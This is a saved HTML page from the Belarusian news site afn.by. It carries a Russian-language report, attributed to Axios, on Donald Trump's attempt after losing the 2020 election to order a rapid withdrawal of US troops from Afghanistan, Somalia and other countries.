
<!DOCTYPE html>
<html>
<head><title>
	СМИ сообщили о попытке Трампа срочно вернуть войска из-за границы | США Выборы Президент | АФН | Белорусские новости | Республика Беларусь | Минск
</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta property="og:image" content="/images/logo.gif" /><link rel="alternate" type="application/rss+xml" title="AFN.BY - Новости Беларуси" href="/news/rss/" /><link rel="icon" href="https://afn.by/favicon.ico" type="image/x-icon" />
    <link href="/styles/cocss.css?v=2020-09-16T2305" rel="stylesheet" type="text/css" />
    <!--[if lte IE 6]>
    <link href="/styles/ie6.css" rel="stylesheet" type="text/css" />
	<![endif]-->
	
	<meta name="keywords" content="США Выборы Президент Экс-президент США Дональд Трамп пытался в экстренном порядке вывести американские войска из-за границы после поражения на выборах президента." /><meta name="description" content="Экс-президент США Дональд Трамп пытался в экстренном порядке вывести американские войска из-за границы после поражения на выборах президента." /> 
	<link rel="stylesheet" type="text/css" href="/styles/cocss2.css" />
	

	<script>
	  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
	  ga('create', 'UA-261460-1', 'auto');
	  ga('send', 'pageview');
	</script>
	<script type="text/javascript">
	<!--//--><![CDATA[//><!--
	var pp_gemius_identifier = new String('chuaoc_Qf5oBaF0jf1u_J5PaDqti6EO9B3Q0cN4cczz.H7');
	var pp_gemius_hitcollector = 'gaby.hit.gemius.pl';
	//--><!]]>
	</script>
	<script type="text/javascript" src="/scripts/xgemius.js"></script>
	<script type='text/javascript'>
	(function() {
		var w = window,
		d = document,
		protocol =/https/i.test(w.location.protocol) ? 'https:' : 'http:',
		aml = typeof admixerML !== 'undefined' ? admixerML : { };
		aml.fn = aml.fn || [];
		aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
		aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
		if (!w.admixerML) {
			var lodash = document.createElement('script');
			lodash.id = 'amlScript';
			lodash.async = true;
			lodash.type = 'text/javascript';
			lodash.src = aml.cdnPath + 'scripts3/loader2.js';
			var node = d.getElementsByTagName('script')[0];
			node.parentNode.insertBefore(lodash, node);
			w.admixerML = aml;
		}
	})();
	</script>
	<script type='text/javascript'>
		admixerML.fn.push(function() {
                admixerML.defineSlot({z: '2febba63-69cc-42a7-8be2-e10bcbe63cd5', ph: 'admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170', i: 'inv-nets'});
                admixerML.defineSlot({z: 'a95e2ad3-94ac-4d52-9a1c-87227345965a', ph: 'admixer_a95e2ad394ac4d529a1c87227345965a_zone_16335_sect_4740_site_4170', i: 'inv-nets'});
                admixerML.singleRequest();
	});
	</script>
<script data-ad-client="ca-pub-5271363197717881" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!--giraffio start
<script type="text/javascript" src="//code.giraff.io/data/widget-afnby.js" async></script>
<!--giraffio end-->
<link href="/WebResource.axd?d=THc8N3S2QkNQqMfl-WTie7cxeKRizU7tc7N60RHbrcj44yBJsW2ah91bqt1hozGOVJ9Lzyy6wzJ7Z4fWBM68ZUFq0yxae3Ry3Yc6Qseymu-MWSkniP2-WFm9EjR0giB-Ss2ocLqAtGS3ptB3kqGNqw2&amp;t=633477618823728610" type="text/css" rel="stylesheet" /></head>
<script type="text/javascript">
	<!--
	var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
	//-->
</script>
<body>
    <!--div style="height:10px;"></div-->
    <form method="post" action="./288981?docid=288981&amp;doctype=news" id="form1">
<input type="hidden" name="C_C_SM_HiddenField" id="C_C_SM_HiddenField" value="" />
<input type="hidden" name="__VIEWSTATE_KEY" id="__VIEWSTATE_KEY" value="VIEWSTATE_107.23.218.4_637569293025524467" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" />


<script type="text/javascript">
//<![CDATA[
var __cultureInfo = {"name":"ru-RU","numberFormat":{"CurrencyDecimalDigits":2,"CurrencyDecimalSeparator":",","IsReadOnly":true,"CurrencyGroupSizes":[3],"NumberGroupSizes":[3],"PercentGroupSizes":[3],"CurrencyGroupSeparator":" ","CurrencySymbol":"₽","NaNSymbol":"не число","CurrencyNegativePattern":8,"NumberNegativePattern":1,"PercentPositivePattern":1,"PercentNegativePattern":1,"NegativeInfinitySymbol":"-∞","NegativeSign":"-","NumberDecimalDigits":2,"NumberDecimalSeparator":",","NumberGroupSeparator":" ","CurrencyPositivePattern":3,"PositiveInfinitySymbol":"∞","PositiveSign":"+","PercentDecimalDigits":2,"PercentDecimalSeparator":",","PercentGroupSeparator":" ","PercentSymbol":"%","PerMilleSymbol":"‰","NativeDigits":["0","1","2","3","4","5","6","7","8","9"],"DigitSubstitution":1},"dateTimeFormat":{"AMDesignator":"","Calendar":{"MinSupportedDateTime":"\/Date(-62135596800000)\/","MaxSupportedDateTime":"\/Date(253402289999999)\/","AlgorithmType":1,"CalendarType":1,"Eras":[1],"TwoDigitYearMax":2029,"IsReadOnly":true},"DateSeparator":".","FirstDayOfWeek":1,"CalendarWeekRule":2,"FullDateTimePattern":"d MMMM yyyy \u0027г.\u0027 H:mm:ss","LongDatePattern":"d MMMM yyyy \u0027г.\u0027","LongTimePattern":"H:mm:ss","MonthDayPattern":"d MMMM","PMDesignator":"","RFC1123Pattern":"ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","ShortDatePattern":"dd.MM.yyyy","ShortTimePattern":"H:mm","SortableDateTimePattern":"yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","TimeSeparator":":","UniversalSortableDateTimePattern":"yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","YearMonthPattern":"MMMM yyyy","AbbreviatedDayNames":["Вс","Пн","Вт","Ср","Чт","Пт","Сб"],"ShortestDayNames":["Вс","Пн","Вт","Ср","Чт","Пт","Сб"],"DayNames":["воскресенье","понедельник","вторник","среда","четверг","пятница","суббота"],"AbbreviatedMonthNames":["янв","фев","мар","апр","май","июн","июл","авг","сен","окт","ноя","дек",""],"MonthNames":["Январь","Февраль","Март","Апрель","Май","Июнь","Июль","Август","Сентябрь","Октябрь","Ноябрь","Декабрь",""],"IsReadOnly":true,"NativeCalendarName":"григорианский календарь","AbbreviatedMonthGenitiveNames":["янв","фев","мар","апр","мая","июн","июл","авг","сен","окт","ноя","дек",""],"MonthGenitiveNames":["января","февраля","марта","апреля","мая","июня","июля","августа","сентября","октября","ноября","декабря",""]},"eras":[1,"наша эра",null,0]};//]]>
</script>

<script src="/ScriptResource.axd?d=akSou45Evp7QYCR6rCy7htnANdHwjDkxFyw36HKSo-8wMdXD9de7URVRMYA51QOIzoWdyxwX0sMjwWU2TzMx4l4Qae2TLQlFVihq1iCOjWSjxpMfsK79SS6cB6nWo__eoZfe-4JwvmEnb7dZSD-vXPY4VBsSz_iUFM1z9dz-vw41&amp;t=4f7d5f1" type="text/javascript"></script>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdADWvVXD1oYELeveMr0vHCmYPVF3pkSfNUXD+9pBGEXyxuneoQbCjwT4VJpNieoGEkD23tlg4h2bhJzZ1bDgWKTTNCQ1wCwXP9yN4xfrsDdthz7WzbbBoChApqb6kSxK+0Zpvn5+Zd4K2xpVZgnKFjhHNGzIFgj5s68nULf4Ss88N/LzaPcrPI4gpwS2XxC1o7hVIgWszjWYGWqprSR4pqYXf+96iztYQp2tFRkq1dfwmT0pVwVnZvCRgcx+ryaUfZole2RQz+vztWyTQPbibC8eiH0mz2PsWmeDcyQTyDTwO4eYsDfzx+mj58P1Y1B8V7QjYpVBmtuIZJg3b9/v8+DyfJw3SKrBfNOQ2PSUTZPL0tGFJ9OL1Oq2bVbPhxjtK21bkK0YRqrFlMCUz2kLg4dwyp1QUDj0WQu24rnE1NDcgZ1LfhTb55dYeuLPfzlD/EJZ5bKGn56co07vvM6p6NvPEKl8yheXdtujfhK0hAXsmXcAAasmeXrg1vxeEIp/v2UZUqx4x2T7Ayni0qDLkIh18k5ZPJqDcGPEWC5IptYmubCxt3cDXYga5z+g+UsraiOt/1Lyjhkew16brZ15agWO/hHDfosysZoL5LoOFeEn/8P8a9Ql3N0wFY7YZkm2xX5Aj6EPTiAJdYPn/yvBD+ln2BcgWMmsePkkq7g2GknRHyD7tuYfunMHZ73fl//12xtrRzIgdSgjZnwwZQsf3r3efB+mUOASJrcEAcippkabsRyl90vzcagzI7jYcobzgEClR9NIMoQibCHvRAV/suBoO6EAZ7RKGfyYbOPos1IUzGT9mSyKM7UvtnknVIriwXEDRCwid8052tGIQ3U/+eQ0gK0v2GySPRCfDu9pIF2uIYCqWJXDIdswUUH5Xo1ASxuyq4qq6Ezx3taC3lkggDSKfO1+CIOTTXFh9AGTcqqV1PWCej1FRmGZivBkWG9TnmsJKpqqVH0CFG2EACsBBEa9wX3K/1iJLta3xAMSfnE5w19a/jyTm6maj+kLGje7/QMAJmhoNbQ99SMrMufugTZRzyyuhrczDQybsO/KKbTrIV+KH8ueX1PVNOrvbQogT1nF42h9/FrsGb8JgiPnpEs+eWt1Hv1j+wyxT0PF8X4Eng0sA6H4JPfCohIoIajuzKmoGLlHE/UuKOkdQiErgXK2X" />
		
		<div style="margin: 10px auto 20px;">
			<div id='admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170'></div>
		</div>
		<script type='text/javascript'>
		admixerML.fn.push(function() { admixerML.display('admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170'); });
		</script>
		<div id="hd">
			<div id="logo">
				<a href="../../"><img src="/images/logo.gif" alt="АФН - Белорусское информационное агенство" width="120" height="60" border="0" /></a>
			</div>
			<div class="c">
				<ul id="toolbar">
					<li class="first"><a href="../../">Главная</a>&nbsp;&nbsp;</li><li><a href="../../news">Новости</a></li><li><a href="../../finances">Финансы</a></li><li><a href="../../oil">Нефть</a></li>
				</ul>
				<ul id="additional_toolbar">
					<li><a href="/sitemap">Карта сайта</a></li>
				</ul>
				<br />
				
				<div class="info">Последнее обновление: 18.05.2021 09:58</div>
				
			</div>
			
		</div>
        	
	<div id="container">
		<div id="content">
			<div class="wrapper">
				<!--:/news/i/288981:-->
<div class="banner-placeholder">
<!-- Yandex.RTB R-A-465488-1 -->
<div id="yandex_rtb_R-A-465488-1"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-465488-1",
                renderTo: "yandex_rtb_R-A-465488-1",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
</div>

				
	
    
<div id="d288981" class="doc">
    <div class="hd">
        
        <h1>СМИ сообщили о попытке Трампа срочно вернуть войска из-за границы</h1>
        
	<div style="float:left;font-size:1em;margin-right: 20px;">
        <div><span><a href="../2021/05/18">18.05.2021 08:32</a></span>&nbsp;|&nbsp;<span><a href="http://afn.by" rel="nofollow" target="_blank">АФН</a></span></div>
        
        <div>Категории: <a href="../category/1,3">США</a> <a href="../category/2,16">Выборы</a> <a href="../category/3,21">Президент</a></div>
	    
	</div>
	<div id="fb-root" style="margin-top:10px;"></div><script src="//connect.facebook.net/en_US/all.js#appId=177634385630657&amp;xfbml=1"></script><fb:like href="" send="true" layout="button_count" width="250" show_faces="true" font="trebuchet ms"></fb:like>
    </div>
    <div class="bd">
    <p>Экс-президент США Дональд Трамп пытался в экстренном порядке вывести американские войска из-за границы после поражения на выборах президента.</p><p>Об этом сообщает издание Axios со ссылкой на источники, передает РБК.</p><p>По информации издания, 9 ноября 2020 года, спустя шесть дней после выборов президента, в которых Трамп в конечном итоге уступил демократу Джо Байдену, один из ближайших помощников главы государства Джон Макэнти передал отставному полковнику Дугласу Макгрегору «лист с несколькими заметками». До этого Макгрегор согласился занять пост старшего советника министра обороны.</p><p>На листке бумаги было четыре пункта: «Вывести нас из Афганистана. Вывести нас из Ирака и Сирии. Завершить вывод [войск] из Германии. Вывести нас из Африки». Макэнти объяснил Макгрегору, что содержание записки — «это то, что хочет от вас президент».</p><p>По словам собеседников Axios, Макгрегор «был потрясен» содержанием записки, поскольку вывод американских солдат из-за границы не обсуждался ни с военным командованием США, ни с конгрессом. Полковник сообщил, что сомневается в возможности вернуть американские войска из-за рубежа до окончания срока полномочий Трампа на посту президента. Он также добавил, что подобные распоряжения всегда подкрепляются официальным приказом главы государства.</p><p>Спустя два дня в офис исполняющего обязанности министра обороны Кристофера Миллера поступил одностраничный документ за подписью Трампа с распоряжением вывести все американские войска из Сомали к 31 декабря 2020 года, а из Афганистана — к 15 января 2021 года. Пентагон связался с Белым домом, но помощники президента не смогли ответить, как появился приказ о выводе войск. Axios сообщает, что руководство служб нацбезопасности решило, что имеют дело с неофициальной операцией, которую проводит лично главнокомандующий.</p><p>Собеседники издания подчеркивают, что Трамп, судя по всему, не осознавал последствий своего распоряжении о немедленном выводе войск. В итоге помощник президента по национальной безопасности Роберт О'Брайен, Миллер и председатель Объединенного комитета начальников штабов смогли убедить главу государства в ошибочности его распоряжения.</p><p>14 апреля Байден объявил о выводе войск из Афганистана, завершить процесс планируется к 11 сентября. По словам президента, американские военнослужащие выполнили все поставленные задачи. По данным The Wall Street Journal, европейские союзники США просили Вашингтон отсрочить вывод войск, чтобы дать силам НАТО больше времени для ухода из Афганистана.</p><p></p>
    </div>
    <div class="ft"></div>
</div>
    <div class="clear" style="width:99%;">
		
		<div class="clear"></div>
		
<div class="l">

	<div class="hd">
		Ранее по теме
	</div>

			<ul class="bd">
				
			<li class="i">
				<a href="/news/i/285455">
				<span class="time">13.01 08:54</span> <span class="title">Вице-президент США отказался применять 25-ю поправку для отстранения Трампа от власти</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285429">
				<span class="time">12.01 09:28</span> <span class="title">Трамп объявил режим ЧС в Вашингтоне из-за инаугурации Байдена</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285395">
				<span class="time">10.01 12:21</span> <span class="title">Демократы предпримут вторую попытку импичмента Дональда Трампа</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285377">
				<span class="time">08.01 09:53</span> <span class="title">Shopify и PayPal заблокировали связанные с Трампом магазины и аккаунт</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285374">
				<span class="time">08.01 08:05</span> <span class="title">В Конгрессе США обсуждают ускоренный импичмент Трампу</span>
				</a>
			</li>
		
			</ul>
		
</div>

    </div>
	<div class="clear"></div>
<br><br>
<!--LuckyAds-->
<!--<div data-la-block="4e3e7c89-f061-45c3-9ca4-e90e26604ad9"></div>-->
<!-- Composite Start 
<div id="M617914ScriptRootC973088"></div>
<script src="https://jsc.lentainform.com/a/f/afn.by.973088.js" async></script>
<!-- Composite End -->
<script async src="https://an.yandex.ru/system/widget.js"></script>
<script>
    (yaads = window.yaads || []).push({
        id: "465488-8",
        render: "#id-465488-8"
    });
</script>
<div id="id-465488-8"></div>


<!--giraff-->
<!--<div id="grf_afnby_2"></div>--->
<!--<div id="M242oY8Bs7fkyrP7JVbL" data-type="2" class="blockOfO1b2l3"></div>-->

    
<div class="clear"></div>
<div id="disqus_thread"></div>
<script type="text/javascript">
    /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
    var disqus_shortname = 'afnby'; // required: replace example with your forum shortname

    // The following are highly recommended additional parameters. Remove the slashes in front to use.
    // var disqus_identifier = 'unique_dynamic_id_1234';
    // var disqus_url = 'http://example.com/permalink-to-page.html';

    var disqus_identifier = 'afnby_news_288981';

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
        var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
<noindex>
<a href="//disqus.com" class="dsq-brlink" rel="nofollow">blog comments powered by <span class="logo-disqus">Disqus</span></a>
</noindex>

<!--

<div id="comments">
    <div class="hd" style="display:none">
		<h4>Комментарии</h4>
    	
	</div>
    
</div>


-->
<!--
<span id="C_C_Co_CommentsClosedLabel" class="commentsClosed">Комментарии запрещены</span>
-->
    
    
				<div class="adv clear">
					<!--2657565487752-->
				</div>
			</div>
		</div>
		<div id="info">			
			
	<div id="C_I_Ca" class="calendar"><div class="c"><table id="C_I_PC" cellspacing="0" cellpadding="2" title="Calendar">
	<tr><td colspan="7" bgcolor="Silver"><table cellspacing="0" width="100%">
		<tr><td width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$PC','V7730')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" width="70%">Апрель 2021</td><td align="right" width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$PC','V7791')" style="color:Black" title="Go to the next month"></a></td></tr>
	</table></td></tr><tr><th align="center" abbr="понедельник" scope="col">Пн</th><th align="center" abbr="вторник" scope="col">Вт</th><th align="center" abbr="среда" scope="col">Ср</th><th align="center" abbr="четверг" scope="col">Чт</th><th align="center" abbr="пятница" scope="col">Пт</th><th align="center" abbr="суббота" scope="col">Сб</th><th align="center" abbr="воскресенье" scope="col">Вс</th></tr><tr><td align="center" width="14%">29</td><td align="center" width="14%">30</td><td align="center" width="14%">31</td><td align="center" width="14%"><a href="/news/2021/04/01">1</a></td><td align="center" width="14%"><a href="/news/2021/04/02">2</a></td><td align="center" width="14%"><a href="/news/2021/04/03">3</a></td><td align="center" width="14%"><a href="/news/2021/04/04">4</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/04/05">5</a></td><td align="center" width="14%"><a href="/news/2021/04/06">6</a></td><td align="center" width="14%"><a href="/news/2021/04/07">7</a></td><td align="center" width="14%"><a href="/news/2021/04/08">8</a></td><td align="center" width="14%"><a href="/news/2021/04/09">9</a></td><td align="center" width="14%"><a href="/news/2021/04/10">10</a></td><td align="center" width="14%"><a href="/news/2021/04/11">11</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/04/12">12</a></td><td align="center" width="14%"><a href="/news/2021/04/13">13</a></td><td align="center" width="14%"><a href="/news/2021/04/14">14</a></td><td align="center" width="14%"><a href="/news/2021/04/15">15</a></td><td align="center" width="14%"><a href="/news/2021/04/16">16</a></td><td align="center" width="14%"><a href="/news/2021/04/17">17</a></td><td align="center" width="14%"><a href="/news/2021/04/18">18</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/04/19">19</a></td><td align="center" width="14%"><a href="/news/2021/04/20">20</a></td><td align="center" width="14%"><a href="/news/2021/04/21">21</a></td><td align="center" width="14%"><a href="/news/2021/04/22">22</a></td><td align="center" width="14%"><a href="/news/2021/04/23">23</a></td><td align="center" width="14%"><a href="/news/2021/04/24">24</a></td><td align="center" width="14%"><a href="/news/2021/04/25">25</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/04/26">26</a></td><td align="center" width="14%"><a href="/news/2021/04/27">27</a></td><td align="center" width="14%"><a href="/news/2021/04/28">28</a></td><td align="center" width="14%"><a href="/news/2021/04/29">29</a></td><td align="center" width="14%"><a href="/news/2021/04/30">30</a></td><td align="center" width="14%">1</td><td align="center" width="14%">2</td></tr><tr><td align="center" width="14%">3</td><td align="center" width="14%">4</td><td align="center" width="14%">5</td><td align="center" width="14%">6</td><td align="center" width="14%">7</td><td align="center" width="14%">8</td><td align="center" width="14%">9</td></tr>
</table></div><div class="c"><table id="C_I_C" cellspacing="0" cellpadding="2" title="Calendar">
	<tr><td colspan="7" bgcolor="Silver"><table cellspacing="0" width="100%">
		<tr><td width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$C','V7761')" style="color:Black" title="Go to the previous month"></a></td><td align="center" width="70%">Май 2021</td><td align="right" width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$C','V7822')" style="color:Black" title="Go to the next month"></a></td></tr>
	</table></td></tr><tr><th align="center" abbr="понедельник" scope="col">Пн</th><th align="center" abbr="вторник" scope="col">Вт</th><th align="center" abbr="среда" scope="col">Ср</th><th align="center" abbr="четверг" scope="col">Чт</th><th align="center" abbr="пятница" scope="col">Пт</th><th align="center" abbr="суббота" scope="col">Сб</th><th align="center" abbr="воскресенье" scope="col">Вс</th></tr><tr><td align="center" width="14%">26</td><td align="center" width="14%">27</td><td align="center" width="14%">28</td><td align="center" width="14%">29</td><td align="center" width="14%">30</td><td align="center" width="14%"><a href="/news/2021/05/01">1</a></td><td align="center" width="14%"><a href="/news/2021/05/02">2</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/05/03">3</a></td><td align="center" width="14%"><a href="/news/2021/05/04">4</a></td><td align="center" width="14%"><a href="/news/2021/05/05">5</a></td><td align="center" width="14%"><a href="/news/2021/05/06">6</a></td><td align="center" width="14%"><a href="/news/2021/05/07">7</a></td><td align="center" width="14%"><a href="/news/2021/05/08">8</a></td><td align="center" width="14%"><a href="/news/2021/05/09">9</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/05/10">10</a></td><td align="center" width="14%"><a href="/news/2021/05/11">11</a></td><td align="center" width="14%"><a href="/news/2021/05/12">12</a></td><td align="center" width="14%"><a href="/news/2021/05/13">13</a></td><td align="center" width="14%"><a href="/news/2021/05/14">14</a></td><td align="center" width="14%"><a href="/news/2021/05/15">15</a></td><td align="center" width="14%"><a href="/news/2021/05/16">16</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/05/17">17</a></td><td align="center" bgcolor="Silver" width="14%"><font color="White"><a href="/news/2021/05/18">18</a></font></td><td class="future" align="center" width="14%">19</td><td class="future" align="center" width="14%">20</td><td class="future" align="center" width="14%">21</td><td class="future" align="center" width="14%">22</td><td class="future" align="center" width="14%">23</td></tr><tr><td class="future" align="center" width="14%">24</td><td class="future" align="center" width="14%">25</td><td class="future" align="center" width="14%">26</td><td class="future" align="center" width="14%">27</td><td class="future" align="center" width="14%">28</td><td class="future" align="center" width="14%">29</td><td class="future" align="center" width="14%">30</td></tr><tr><td class="future" align="center" width="14%">31</td><td class="future" align="center" width="14%">1</td><td class="future" align="center" width="14%">2</td><td class="future" align="center" width="14%">3</td><td class="future" align="center" width="14%">4</td><td class="future" align="center" width="14%">5</td><td class="future" align="center" width="14%">6</td></tr>
</table></div></div>
	<div class="clear"></div>
	
<div class="l">

	<div class="hd">
		В мире
	</div>

			<ul class="bd">
				
			<li class="i">
				<a href="/news/i/288988">
				<span class="time">18.05 09:58</span> <span class="title">В мире число заражений коронавирусом превысило 164,28 млн</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288983">
				<span class="time">18.05 08:37</span> <span class="title">Евросоюз продлил санкции в отношении хакеров из России, Китая и КНДР</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288964">
				<span class="time">17.05 08:23</span> <span class="title">ВОЗ предупреждает о риске ранней смерти из-за длительного рабочего дня</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288963">
				<span class="time">17.05 08:09</span> <span class="title">ВВС Израиля нанесли мощный удар по городу Газа</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288962">
				<span class="time">17.05 07:01</span> <span class="title">В мире число заражений коронавирусом превысило 163,71 млн</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288957">
				<span class="time">16.05 09:02</span> <span class="title">ХАМАС совершил массированный ракетный обстрел Тель-Авива</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288956">
				<span class="time">16.05 08:50</span> <span class="title">В мире число заражений коронавирусом превысило 163,18 млн</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288955">
				<span class="time">16.05 08:47</span> <span class="title">На западе Мьянмы идут ожесточенные бои хунты с населением</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288949">
				<span class="time">15.05 10:21</span> <span class="title">В мире число заражений коронавирусом превысило 162,55 млн</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288948">
				<span class="time">15.05 10:02</span> <span class="title">Япония дополнительно выделяет на COVID-вакцины $4,7 миллиарда</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288942">
				<span class="time">15.05 08:47</span> <span class="title">Байден отменил сразу семь указов Трампа</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288937">
				<span class="time">14.05 16:52</span> <span class="title">Samsung встроит криптовалютный кошелек в смартфоны серии Galaxy</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288928">
				<span class="time">14.05 13:40</span> <span class="title">В Германии показатель заболеваемости COVID-19 упал ниже ключевого порога</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288926">
				<span class="time">14.05 12:25</span> <span class="title">Транспортировка газа из ЕС в Украину уменьшилась в 7 раз</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288922">
				<span class="time">14.05 10:46</span> <span class="title">Греция официально открылась для иностранных туристов</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288920">
				<span class="time">14.05 09:45</span> <span class="title">Японские города из-за COVID-19 отказываются принимать олимпийских спортсменов</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288919">
				<span class="time">14.05 09:31</span> <span class="title">Чехия передумала и будет признавать сертификаты вакцинации соседних стран</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288918">
				<span class="time">14.05 09:23</span> <span class="title">Массовые протесты оставили один из крупнейших городов Колумбии без топлива</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288916">
				<span class="time">14.05 08:27</span> <span class="title">В мире число заражений коронавирусом превысило 161,83 млн</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288911">
				<span class="time">14.05 07:17</span> <span class="title">Генсек ООН призвал Израиль и Палестину немедленно прекратить обстрелы</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288903">
				<span class="time">13.05 14:56</span> <span class="title">Нефть продолжает дешеветь после возобновления работы трубопровода Colonial в США</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288896">
				<span class="time">13.05 11:44</span> <span class="title">CША снимают санкции c Xiaomi</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288893">
				<span class="time">13.05 10:06</span> <span class="title">В Румынии на продажу выставят самолет Чаушеску</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288891">
				<span class="time">13.05 09:41</span> <span class="title">Регулятор ЕС: утвержденные вакцины действуют против индийского штамма коронавируса</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/288890">
				<span class="time">13.05 09:17</span> <span class="title">Правительство Германии обновило правила въезда в страну в условиях пандемии</span>
				</a>
			</li>
		
			</ul>
		
</div>

	<!--False-->

			<div class="adv clear">
<!-- Yandex.RTB R-A-465488-2 -->
<div id="yandex_rtb_R-A-465488-2"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-465488-2",
                renderTo: "yandex_rtb_R-A-465488-2",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
<!-- sidebar start -->
<!--<div id="grf_afnby"></div>-->
<!-- sidebar end -->

</div>

		<!--	-->
</div>
		<div id="nav">
			<div>
				<br />
				<ul id="menu">
					<li><a href="../top">Главное</a></li>
					
							
							<li><a href="../politics">Политика</a></li>
						
							<li><a href="../economy">Экономика</a></li>
						
							<li><a href="../energy">Энергетика</a></li>
						
							<li><a href="../social">Общество</a></li>
						
						
				</ul>
			</div>
			
			
			<div class="redBtn">
				<a href="/news/i/279946">afn.by заблокирован Мининформом<br><br>Помоги сайту</a>
			</div>
			
		</div>
	</div>

		<div id="ft">
			<div class="c">
				&copy; 1995-2019 УП "Ньюс-Релиз"<br />
				<a href="../../contacts">Контактная информация</a> | <a href="../../copyrights">Права на использование</a>
			</div>
			<div class="clear">
			</div>
			
	

		</div>
    </form>
<!-- Yandex.Metrika counter -->
<script type="text/javascript" >
   (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
   m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(421539, "init", {
        clickmap:true,
        trackLinks:true,
        accurateTrackBounce:true,
        trackHash:true
   });
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/421539" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
